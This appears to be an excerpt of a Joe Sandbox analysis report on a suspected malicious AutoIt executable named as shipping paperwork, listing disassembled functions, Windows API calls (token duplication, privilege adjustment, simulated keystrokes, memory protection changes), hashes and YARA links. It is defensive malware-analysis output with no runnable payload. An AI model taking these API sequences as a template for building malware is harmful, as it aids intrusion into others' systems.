                                                                • Instruction ID: 96d856b0c6ab79d5d862c36da259b00118573fb3dc862bc7d1060b1f67c05212
                                                                • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                • Instruction Fuzzy Hash: 1212DE20E18658C6EB24DF64D8507DEB272EF68300F1090E9D14DEB7A4E77A4E81CB5A
                                                                Function 0093750F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: 0c914e3bb7f6756f813bb07983ad7a736a1ca4529dc994f532354f6af9be8d0c
                                                                • Instruction ID: 3731cbef154979ddf3275b91450b86bd99f6c225fbf0cabe5ac9f61df4a2e509
                                                                • Opcode Fuzzy Hash: 0c914e3bb7f6756f813bb07983ad7a736a1ca4529dc994f532354f6af9be8d0c
                                                                • Instruction Fuzzy Hash: 5C31A1B9208A02DFC728DF99C091A21F7A4FF49310B14C569F98A8B795E730E841CF85
                                                                Function 00950C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID:
                                                                • API String ID: 544645111-0
                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction ID: 82f67df07ad191abdd5fbd4b5a72972d9c704412bae57a498aa3fcc15706c11b
                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                • Instruction Fuzzy Hash: 5331D770A001059BC718DF5AC484969F7A6FF9A302B6887A5E88ACF351D731EDC5DBC0
                                                                Function 0096FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClearVariant
                                                                • String ID:
                                                                • API String ID: 1473721057-0
                                                                • Opcode ID: 27707938342d1cba611f758408d27271d8fd50015fbdc90df85169cb3a4ca9fb
                                                                • Instruction ID: 170ff3cfde83edf31b92aa996535c972b1e471f7ad92693ee2d36b63134e041c
                                                                • Opcode Fuzzy Hash: 27707938342d1cba611f758408d27271d8fd50015fbdc90df85169cb3a4ca9fb
                                                                • Instruction Fuzzy Hash: 1A4105746083418FDB24DF14C454B1ABBE5BF85318F1988ACE9998B362C772EC49CF52
                                                                Function 00937B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: bcbcce42c06b6b59476f5f1fbe4b06b9338fca74c9a5361d5f97f5ad378e9633
                                                                • Instruction ID: 9b0dc1219e386783de1883eaa590bedeb151eca124fc1b659b561b21fb1faa48
                                                                • Opcode Fuzzy Hash: bcbcce42c06b6b59476f5f1fbe4b06b9338fca74c9a5361d5f97f5ad378e9633
                                                                • Instruction Fuzzy Hash: 20217FB2614A09EBDB208F55EC8176DBBB8FF54350F21842DE8C5C91A0EB34C4D0DB41
                                                                Function 00934DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00934BEF
                                                                  • Part of subcall function 0095525B: __wfsopen.LIBCMT ref: 00955266
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E0F
                                                                  • Part of subcall function 00934B6A: FreeLibrary.KERNEL32(00000000), ref: 00934BA4
                                                                  • Part of subcall function 00934C70: _memmove.LIBCMT ref: 00934CBA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                • String ID:
                                                                • API String ID: 1396898556-0
                                                                • Opcode ID: 06d79556df8ee2a50928b9f01dd537c5ed748ea64eab7dc9f7193e5635dce4f7
                                                                • Instruction ID: 78a8528de13375eff29bf2f4774c70289916c090062d62565567f9e67745d5a0
                                                                • Opcode Fuzzy Hash: 06d79556df8ee2a50928b9f01dd537c5ed748ea64eab7dc9f7193e5635dce4f7
                                                                • Instruction Fuzzy Hash: 3611E331600205ABCF24EF74CC16FAE77A8EFC4710F118829F555AB281DA75AA009F90
                                                                Function 0096FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClearVariant
                                                                • String ID:
                                                                • API String ID: 1473721057-0
                                                                • Opcode ID: 372f7a232e5b54307f8e302a3eab89fd4e2de830d28135a3cd34e422fafaeb74
                                                                • Instruction ID: 31b6596136063133c00ee61177016fc5373691348291b06a25aa9f73c34f89d8
                                                                • Opcode Fuzzy Hash: 372f7a232e5b54307f8e302a3eab89fd4e2de830d28135a3cd34e422fafaeb74
                                                                • Instruction Fuzzy Hash: BE210274908301DFCB14DF64C444B1ABBE5BF88315F058968F99A57762D731E809CF92
                                                                Function 00954863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __lock_file.LIBCMT ref: 009548A6
                                                                  • Part of subcall function 00958B28: __getptd_noexit.LIBCMT ref: 00958B28
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __getptd_noexit__lock_file
                                                                • String ID:
                                                                • API String ID: 2597487223-0
                                                                • Opcode ID: e60163ab1ef8a9b26b0fcc7a81ea8e7c07d39de2dff6f787f988f612882e8bc4
                                                                • Instruction ID: 63a75cb195dd42f56fc1e1b535759d4ace8cb1b810bb0cf45f4aaba7a362f26f
                                                                • Opcode Fuzzy Hash: e60163ab1ef8a9b26b0fcc7a81ea8e7c07d39de2dff6f787f988f612882e8bc4
                                                                • Instruction Fuzzy Hash: D6F0F431800604EBDF51EF628C063AF36A4AF4032BF004404BE14AA191CB788998DF41
                                                                Function 00934E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID:
                                                                • API String ID: 3664257935-0
                                                                • Opcode ID: e92143a91c5adbe87996de7eff66a93c8e836d0bc6dec0621ec2705e37520c83
                                                                • Instruction ID: 88065daee0a82324106a640d64c273ad99a1b89b0f4293c3260564257cf856c1
                                                                • Opcode Fuzzy Hash: e92143a91c5adbe87996de7eff66a93c8e836d0bc6dec0621ec2705e37520c83
                                                                • Instruction Fuzzy Hash: 76F03971505711CFCB349F64E898812BBE5BF5432A7228E7EE1DA86620C736A844DF40
                                                                Function 00950791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009507B0
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LongNamePath_memmove
                                                                • String ID:
                                                                • API String ID: 2514874351-0
                                                                • Opcode ID: b1368c0fb087ea5c9d6521e532194d81e83edd2336ceac0d8bd491729a0b5e1f
                                                                • Instruction ID: 758d12b19a78b3cc2304235943982dad58b85489b31199ec236c62e50b656368
                                                                • Opcode Fuzzy Hash: b1368c0fb087ea5c9d6521e532194d81e83edd2336ceac0d8bd491729a0b5e1f
                                                                • Instruction Fuzzy Hash: 61E0CD7790412857C720D6A89C05FEAB7EDDFC87A0F0441B6FC0CD7304D9609C8086D0
                                                                Function 0095525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wfsopen
                                                                • String ID:
                                                                • API String ID: 197181222-0
                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                • Instruction ID: a2f4f25baad626879113f7cb6de0b118a737b9abb2354d91d388791391d5beb0
                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                • Instruction Fuzzy Hash: 12B0927644020C77CE016A82EC02B493B199B81764F408020FF1C18172A673A6689B8A
                                                                Function 010D88B4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction ID: 3f993f024b550bbd88458c742c27a79ad429d007dc0a577a381053f1d9165727
                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction Fuzzy Hash: A7E0BF7494020DEFDB00DFA4D5496DD7BB4EF04301F1045A1FD05D7680DB319E549A62
                                                                Function 010D88B8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction ID: 7ed28488680f0bb2e1a10f61cb5e97d752c4b4e1ae7603002aa08aea2315e60b
                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction Fuzzy Hash: 98E0E67494020DDFDB00DFB4D5496DD7BB4EF04301F104161FD05D2280D6319D509A62

                                                                Non-executed Functions

                                                                Function 009BCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009BCB37
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009BCB95
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BCBD6
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009BCC00
                                                                • SendMessageW.USER32 ref: 009BCC29
                                                                • _wcsncpy.LIBCMT ref: 009BCC95
                                                                • GetKeyState.USER32(00000011), ref: 009BCCB6
                                                                • GetKeyState.USER32(00000009), ref: 009BCCC3
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009BCCD9
                                                                • GetKeyState.USER32(00000010), ref: 009BCCE3
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009BCD0C
                                                                • SendMessageW.USER32 ref: 009BCD33
                                                                • SendMessageW.USER32(?,00001030,?,009BB348), ref: 009BCE37
                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009BCE4D
                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009BCE60
                                                                • SetCapture.USER32(?), ref: 009BCE69
                                                                • ClientToScreen.USER32(?,?), ref: 009BCECE
                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009BCEDB
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009BCEF5
                                                                • ReleaseCapture.USER32 ref: 009BCF00
                                                                • GetCursorPos.USER32(?), ref: 009BCF3A
                                                                • ScreenToClient.USER32(?,?), ref: 009BCF47
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 009BCFA3
                                                                • SendMessageW.USER32 ref: 009BCFD1
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 009BD00E
                                                                • SendMessageW.USER32 ref: 009BD03D
                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009BD05E
                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009BD06D
                                                                • GetCursorPos.USER32(?), ref: 009BD08D
                                                                • ScreenToClient.USER32(?,?), ref: 009BD09A
                                                                • GetParent.USER32(?), ref: 009BD0BA
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 009BD123
                                                                • SendMessageW.USER32 ref: 009BD154
                                                                • ClientToScreen.USER32(?,?), ref: 009BD1B2
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009BD1E2
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 009BD20C
                                                                • SendMessageW.USER32 ref: 009BD22F
                                                                • ClientToScreen.USER32(?,?), ref: 009BD281
                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009BD2B5
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BD351
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                • String ID: @GUI_DRAGID$F
                                                                • API String ID: 3977979337-4164748364
                                                                • Opcode ID: 257b09fd08fab48c9fea2aa0f8f0c4afafc2a86e592a0682d48c211b428e14e8
                                                                • Instruction ID: a4e431c08d1bbd82ffacd0d625affc536931e7fed5b01ae617fe530da52fa187
                                                                • Opcode Fuzzy Hash: 257b09fd08fab48c9fea2aa0f8f0c4afafc2a86e592a0682d48c211b428e14e8
                                                                • Instruction Fuzzy Hash: DB42ADB4208745AFD724CF68DA44BAABFE9FF48324F140A19F6958B2B1D731D840EB51
                                                                Function 00946F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$_memset
                                                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                • API String ID: 1357608183-1798697756
                                                                • Opcode ID: 9c8bd47063e305b0e4b4d2db47dffbbf0a91bb1a74239ba329d72b8cc9cfa650
                                                                • Instruction ID: dee77018e68b342c048d51a7d9c2a8b3c707cfb3fec92a71cb0f5194d55540fb
                                                                • Opcode Fuzzy Hash: 9c8bd47063e305b0e4b4d2db47dffbbf0a91bb1a74239ba329d72b8cc9cfa650
                                                                • Instruction Fuzzy Hash: B993B071E0421ADFDB24DF98C881BADB7B5FF48710F24856AE945AB381E7749E81CB40
                                                                Function 009348D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(00000000,?), ref: 009348DF
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096D665
                                                                • IsIconic.USER32(?), ref: 0096D66E
                                                                • ShowWindow.USER32(?,00000009), ref: 0096D67B
                                                                • SetForegroundWindow.USER32(?), ref: 0096D685
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096D69B
                                                                • GetCurrentThreadId.KERNEL32 ref: 0096D6A2
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096D6AE
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0096D6BF
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0096D6C7
                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0096D6CF
                                                                • SetForegroundWindow.USER32(?), ref: 0096D6D2
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D6E7
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D6F2
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D6FC
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D701
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D70A
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D70F
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D719
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D71E
                                                                • SetForegroundWindow.USER32(?), ref: 0096D721
                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0096D748
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 4125248594-2988720461
                                                                • Opcode ID: 654a475ec32b94c953acea54d325ea21e9be47f84e2fcb14c833ab8e3fbf0fca
                                                                • Instruction ID: 8ab9e316e6e8dc2e090b1f7df12c726965de85291bc3ddf3071dbb411d0afdfc
                                                                • Opcode Fuzzy Hash: 654a475ec32b94c953acea54d325ea21e9be47f84e2fcb14c833ab8e3fbf0fca
                                                                • Instruction Fuzzy Hash: 3F31A371B51318BBEB202F659D89FBF3F6CEB44B60F104125FA04EA1D1CAB05D01BAA1
                                                                Function 00988310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                  • Part of subcall function 009887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                  • Part of subcall function 009887E1: GetLastError.KERNEL32 ref: 00988865
                                                                • _memset.LIBCMT ref: 00988353
                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009883A5
                                                                • CloseHandle.KERNEL32(?), ref: 009883B6
                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009883CD
                                                                • GetProcessWindowStation.USER32 ref: 009883E6
                                                                • SetProcessWindowStation.USER32(00000000), ref: 009883F0
                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0098840A
